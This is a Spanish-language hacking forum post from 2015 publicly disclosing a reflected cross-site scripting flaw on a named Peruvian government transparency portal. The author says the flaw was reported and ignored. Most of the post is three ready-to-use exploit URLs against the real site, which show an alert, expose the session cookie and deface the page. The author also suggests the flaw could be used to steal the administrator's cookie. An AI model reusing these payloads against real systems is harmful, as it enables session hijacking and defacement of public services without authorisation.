comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[XSS] Peru Gob

  • 0 Respuestas
  • 952 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado aaaaaaaaaaaaaaaaaa

  • *
  • Underc0der
  • Mensajes: 43
  • Actividad:
    0%
  • Reputación 0
  • Let's Learn
    • Ver Perfil
    • Email
  • Skype: v4char
  • Twitter: v4char
« en: Noviembre 19, 2015, 02:13:31 pm »
Hola, hoy traigo un XSS en la web del gobierno de peru la vulnerabilidad ya esta reportada por mi de hace mucho pero como no hacen caso...

Bueno el tema fue que me meti en la web en busca de un fallo asi rapido y encontre un xss en el portal de transparencia solo probe XSS pero estoy seguro que puede tener otros como SQLi aunque yo no he probado ni incito a hacerlo bueno es un XSS muy simple no tiene filtros ni nada a si que permite ejecutar javascript lo que puede permitir a un atacante robar la cookie del administrado del sitio y hacer cosas malas aquí dejo un video subido por mí


y ahora unos pequeños ejemplos de lo que puedes hacer

Alert
Código: You are not allowed to view links. Register or Login
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28%22v4char%22%29;%3C/script%3E&id_tema=34


Cookies
Código: You are not allowed to view links. Register or Login
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&id_tema=34

Body
Código: You are not allowed to view links. Register or Login
http://www.peru.gob.pe/transparencia/pep_transparencia_osce_exoneraciones_frame.asp?id_entidad=1%27%22;/%3E%3Cscript%3E%20document.body.innerHTML%20=%20%22%3Ch1%3Ev4char%3C/h1%3E%22;%3C/script%3E&id_tema=34

y asi lo que quieras...

 

¿Te gustó el post? COMPARTILO!